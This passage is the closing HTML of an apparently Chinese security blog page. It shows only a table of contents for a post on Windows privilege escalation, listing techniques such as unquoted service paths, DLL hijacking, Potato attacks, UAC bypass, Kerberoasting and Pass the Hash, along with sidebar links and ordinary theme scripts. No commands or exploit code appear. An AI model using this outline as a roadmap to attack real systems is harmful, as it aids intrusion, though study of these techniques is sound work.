href="#2-4-%E5%87%AD%E6%8D%AE%E6%90%9C%E7%B4%A2"><span class="toc-number">3.4.</span> <span class="toc-text">2.4 凭据搜索</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="toc-number">4.</span> <span class="toc-text">三、内核漏洞提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-1-%E5%B8%B8%E8%A7%81-CVE"><span class="toc-number">4.1.</span> <span class="toc-text">3.1 常见 CVE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-2-%E4%BB%A4%E7%89%8C%E7%AA%83%E5%8F%96%E5%8E%9F%E7%90%86"><span class="toc-number">4.2.</span> <span class="toc-text">3.2 令牌窃取原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-3-%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B%E5%B7%A5%E5%85%B7"><span class="toc-number">4.3.</span> <span class="toc-text">3.3 漏洞检测工具</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text">四、配置错误提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-%E6%9C%AA%E5%BC%95%E7%94%A8%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84%EF%BC%88Unquoted-Service-Path%EF%BC%89"><span class="toc-number">5.1.</span> <span class="toc-text">4.1 未引用服务路径（Unquoted Service Path）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-2-%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF"><span class="toc-number">5.2.</span> <span class="toc-text">4.2 服务权限配置错误</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-3-AlwaysInstallElevated"><span class="toc-number">5.3.</span> <span class="toc-text">4.3 AlwaysInstallElevated</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-4-%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%9D%83%E9%99%90%E9%94%99%E8%AF%AF"><span class="toc-number">5.4.</span> <span class="toc-text">4.4 注册表权限错误</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-5-%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-number">5.5.</span> <span class="toc-text">4.5 计划任务提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-6-DLL-%E5%8A%AB%E6%8C%81"><span class="toc-number">5.6.</span> <span class="toc-text">4.6 DLL 劫持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-7-%E5%85%B6%E4%BB%96%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF"><span class="toc-number">5.7.</span> <span class="toc-text">4.7 其他配置错误</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81%E7%89%B9%E6%9D%83%E6%BB%A5%E7%94%A8%E6%8F%90%E6%9D%83"><span class="toc-number">6.</span> <span class="toc-text">五、特权滥用提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#5-1-Potato-%E6%94%BB%E5%87%BB%E6%A0%B8%E5%BF%83%E5%8E%9F%E7%90%86"><span class="toc-number">6.1.</span> <span class="toc-text">5.1 Potato 攻击核心原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-2-Potato-%E5%B7%A5%E5%85%B7%E6%BC%94%E8%BF%9B"><span class="toc-number">6.2.</span> <span class="toc-text">5.2 Potato 工具演进</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-3-SeDebugPrivilege-%E5%88%A9%E7%94%A8"><span class="toc-number">6.3.</span> <span class="toc-text">5.3 SeDebugPrivilege 利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81UAC-%E7%BB%95%E8%BF%87%E6%8F%90%E6%9D%83"><span class="toc-number">7.</span> <span class="toc-text">六、UAC 绕过提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#6-1-%E8%87%AA%E5%8A%A8%E6%8F%90%E5%8D%87%E6%9C%BA%E5%88%B6"><span class="toc-number">7.1.</span> <span class="toc-text">6.1 自动提升机制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-2-%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="toc-number">7.2.</span> <span class="toc-text">6.2 常见绕过方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-3-UACME-%E5%B7%A5%E5%85%B7"><span class="toc-number">7.3.</span> <span class="toc-text">6.3 UACME 工具</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81Active-Directory-%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%8F%90%E6%9D%83"><span class="toc-number">8.</span> <span class="toc-text">七、Active Directory 域环境提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#7-1-BloodHound-%E8%B7%AF%E5%BE%84%E5%88%86%E6%9E%90"><span class="toc-number">8.1.</span> <span class="toc-text">7.1 BloodHound 路径分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-2-Kerberoasting"><span class="toc-number">8.2.</span> <span class="toc-text">7.2 Kerberoasting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-3-AS-REP-Roasting"><span class="toc-number">8.3.</span> <span class="toc-text">7.3 AS-REP Roasting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-4-Pass-the-Hash-Pass-the-Ticket"><span class="toc-number">8.4.</span> <span class="toc-text">7.4 Pass the Hash &#x2F; Pass the Ticket</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-5-GPP-%E5%AF%86%E7%A0%81%E8%A7%A3%E5%AF%86"><span class="toc-number">8.5.</span> <span class="toc-text">7.5 GPP 密码解密</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E3%80%81%E8%87%AA%E5%8A%A8%E5%8C%96%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7"><span class="toc-number">9.</span> <span class="toc-text">八、自动化提权工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B9%9D%E3%80%81%E9%98%B2%E5%BE%A1%E4%B8%8E%E7%BC%93%E8%A7%A3"><span class="toc-number">10.</span> <span class="toc-text">九、防御与缓解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#9-1-%E6%9C%80%E5%B0%8F%E6%9D%83%E9%99%90%E5%8E%9F%E5%88%99"><span class="toc-number">10.1.</span> <span class="toc-text">9.1 最小权限原则</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-2-%E6%9C%8D%E5%8A%A1%E4%B8%8E%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%8A%A0%E5%9B%BA"><span class="toc-number">10.2.</span> <span class="toc-text">9.2 服务与注册表加固</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-3-%E8%A1%A5%E4%B8%81%E7%AE%A1%E7%90%86"><span class="toc-number">10.3.</span> <span class="toc-text">9.3 补丁管理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-4-%E7%9B%91%E6%8E%A7%E5%AE%A1%E8%AE%A1"><span class="toc-number">10.4.</span> <span class="toc-text">9.4 监控审计</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">11.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">12.</span> <span class="toc-text">参考资料</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/778cb5e4/" title="Windows提权小结"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/1774pAqTn" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Windows提权小结"/></a><div class="content"><a class="title" href="/posts/778cb5e4/" title="Windows提权小结">Windows提权小结</a><time datetime="2026-08-23T13:00:00.000Z" title="发表于 2026-08-23 21:00:00">2026-08-23</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/235e4160/" title="Linux提权小结"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/gbG1N1xSR" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Linux提权小结"/></a><div class="content"><a class="title" href="/posts/235e4160/" title="Linux提权小结">Linux提权小结</a><time datetime="2026-07-26T13:00:00.000Z" title="发表于 2026-07-26 21:00:00">2026-07-26</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/1c3aceaf/" title="LLM提示词注入攻击"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="https://z.wiki/u/8fSOsdP00" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="LLM提示词注入攻击"/></a><div class="content"><a class="title" href="/posts/1c3aceaf/" title="LLM提示词注入攻击">LLM提示词注入攻击</a><time datetime="2026-06-28T04:00:00.000Z" title="发表于 2026-06-28 12:00:00">2026-06-28</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2025 - 2026 By Liebert77</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdnjs.onmicrosoft.cn/ajax/libs/instant.page/5.2.0/instantpage.min.js" type="module"></script><script src="https://cdnjs.onmicrosoft.cn/ajax/libs/vanilla-lazyload/19.1.3/lazyload.iife.min.js"></script><div class="js-pjax"></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="30" mobile="false" src="https://cdnjs.onmicrosoft.cn/ajax/libs/butterfly-extsrc/1.1.4/canvas-nest.min.js"></script><script id="click-heart" src="https://cdnjs.onmicrosoft.cn/ajax/libs/butterfly-extsrc/1.1.4/click-heart.min.js" async="async" mobile="false"></script><script src="https://cdnjs.onmicrosoft.cn/ajax/libs/pjax/0.2.8/pjax.min.js"></script><script>(() => {
  const pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]

  window.pjax = new Pjax({
    elements: 'a:not([target="_blank"])',
    selectors: pjaxSelectors,
    cacheBust: false,
    analytics: false,
    scrollRestoration: false
  })

  const triggerPjaxFn = (val) => {
    if (!val) return
    Object.values(val).forEach(fn => fn())
  }

  document.addEventListener('pjax:send', () => {
    // removeEventListener
    btf.removeGlobalFnEvent('pjaxSendOnce')
    btf.removeGlobalFnEvent('themeChange')

    // reset readmode
    const $bodyClassList = document.body.classList
    if ($bodyClassList.contains('read-mode')) $bodyClassList.remove('read-mode')

    triggerPjaxFn(window.globalFn.pjaxSend)
  })

  document.addEventListener('pjax:complete', () => {
    btf.removeGlobalFnEvent('pjaxCompleteOnce')
    document.querySelectorAll('script[data-pjax]').forEach(item => {
      const newScript = document.createElement('script')
      const content = item.text || item.textContent || item.innerHTML || ""
      Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
      newScript.appendChild(document.createTextNode(content))
      item.parentNode.replaceChild(newScript, item)
    })

    triggerPjaxFn(window.globalFn.pjaxComplete)
  })

  document.addEventListener('pjax:error', e => {
    if (e.request.status === 404) {
      pjax.loadUrl('/404')
    }
  })
})()</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="text-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div><div id="local-search-stats-wrap"></div></div></div><div id="search-mask"></div><script src="/js/search/local-search.js"></script></div></div><!-- hexo injector body_end start --> <script data-pjax>if(document.getElementById('recent-posts') && (location.pathname ==='/'|| '/' ==='all')){
    var parent = document.getElementById('recent-posts');
    var child = '<div class="recent-post-item" style="width:100%;height: auto"><div id="catalog_magnet"><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/CTF-WP/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">🎯 CTF-WP (18)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/靶场通关/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">🛡️ 靶场通关 (5)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/Vulnhub/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">💻 Vulnhub (12)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/取证应急/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">🕵️ 取证应急 (4)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/流量分析/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">📊 流量分析 (2)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><div class="magnet_item"><a class="magnet_link" href="https://liebert77.github.io/categories/技术杂项/"><div class="magnet_link_context" style=""><span style="font-weight:500;flex:1">🔨 技术杂项 (4)</span><span style="padding:0px 4px;border-radius: 8px;"><i class="fas fa-arrow-circle-right"></i></span></div></a></div><a class="magnet_link_more"  href="https://liebert77.github.io/categories" style="flex:1;text-align: center;margin-bottom: 10px;">查看更多...</a></div></div>';
    console.log('已挂载magnet')
    parent.insertAdjacentHTML("afterbegin",child)}
     </script><style>#catalog_magnet{flex-wrap: wrap;display: flex;width:100%;justify-content:space-between;padding: 10px 10px 0 10px;align-content: flex-start;}.magnet_item{flex-basis: calc(50% - 5px);background: #f2f2f2;margin-bottom: 10px;border-radius: 8px;transition: all 0.2s ease-in-out;}.magnet_item:hover{background: #69e8f2}.magnet_link_more{color:#555}.magnet_link{color:black}.magnet_link:hover{color:white}@media screen and (max-width: 600px) {.magnet_item {flex-basis: 100%;}}.magnet_link_context{display:flex;padding: 10px;font-size:16px;transition: all 0.2s ease-in-out;}.magnet_link_context:hover{padding: 10px 20px;}</style>
    <style></style><script data-pjax>
  function butterfly_footer_beautify_injector_config(){
    var parent_div_git = document.getElementById('footer-wrap');
    var item_html = '<p id="ghbdages"><a class="github-badge" target="_blank" href="https://hexo.io/" style="margin-inline:5px" title=""><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/badges/badge-hexo.svg" alt=""/></a><a class="github-badge" target="_blank" href="https://butterfly.js.org/" style="margin-inline:5px" title=""><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/badges/badge-butterfly.svg" alt=""/></a><a class="github-badge" target="_blank" href="https://vercel.com/" style="margin-inline:5px" title=""><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/badges/badge-vercel.svg" alt=""/></a><a class="github-badge" target="_blank" href="https://github.com/" style="margin-inline:5px" title=""><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/badges/badge-github.svg" alt=""/></a><a class="github-badge" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" style="margin-inline:5px" title=""><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/badges/badge-cc.svg" alt=""/></a></p>';
    console.log('已挂载butterfly_footer_beautify')
    parent_div_git.insertAdjacentHTML("beforeend",item_html)
    }
  var elist = 'null'.split(',');
  var cpage = location.pathname;
  var epage = 'all';
  var flag = 0;

  for (var i=0;i<elist.length;i++){
    if (cpage.includes(elist[i])){
      flag++;
    }
  }

  if ((epage ==='all')&&(flag == 0)){
    butterfly_footer_beautify_injector_config();
  }
  else if (epage === cpage){
    butterfly_footer_beautify_injector_config();
  }
  </script><script data-pjax>
  function butterfly_swiper_injector_config(){
    var parent_div_git = document.getElementById('recent-posts');
    var item_html = '<div class="recent-post-item" style="height: auto;width: 100%"><div class="blog-slider swiper-container-fade swiper-container-horizontal" id="swiper_container"><div class="blog-slider__wrp swiper-wrapper" style="transition-duration: 0ms;"><div class="blog-slider__item swiper-slide" style="width: 750px; opacity: 1; transform: translate3d(0px, 0px, 0px); transition-duration: 0ms;"><a class="blog-slider__img" onclick="pjax.loadUrl(&quot;posts/b05f398f/&quot;);" href="javascript:void(0);" alt=""><img width="48" height="48" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/dk.jpg" alt="" onerror="this.src=https://unpkg.zhimg.com/akilar-candyassets/image/loading.gif; this.onerror = null;"/></a><div class="blog-slider__content"><span class="blog-slider__code">2025-01-14</span><a class="blog-slider__title" onclick="pjax.loadUrl(&quot;posts/b05f398f/&quot;);" href="javascript:void(0);" alt="">DK盾推广</a><div class="blog-slider__text">DK盾推广文章</div><a class="blog-slider__button" onclick="pjax.loadUrl(&quot;posts/b05f398f/&quot;);" href="javascript:void(0);" alt="">详情       </a></div></div></div><div class="blog-slider__pagination swiper-pagination-clickable swiper-pagination-bullets"></div></div></div>';
    console.log('已挂载butterfly_swiper')
    parent_div_git.insertAdjacentHTML("afterbegin",item_html)
    }
  var elist = 'undefined'.split(',');
  var cpage = location.pathname;
  var epage = '/';
  var flag = 0;

  for (var i=0;i<elist.length;i++){
    if (cpage.includes(elist[i])){
      flag++;
    }
  }

  if ((epage ==='all')&&(flag == 0)){
    butterfly_swiper_injector_config();
  }
  else if (epage === cpage){
    butterfly_swiper_injector_config();
  }
  </script><script defer src="https://npm.onmicrosoft.cn/hexo-butterfly-swiper/lib/swiper.min.js"></script><script defer data-pjax src="https://npm.onmicrosoft.cn/hexo-butterfly-swiper/lib/swiper_init.js"></script><!-- hexo injector body_end end --></body></html>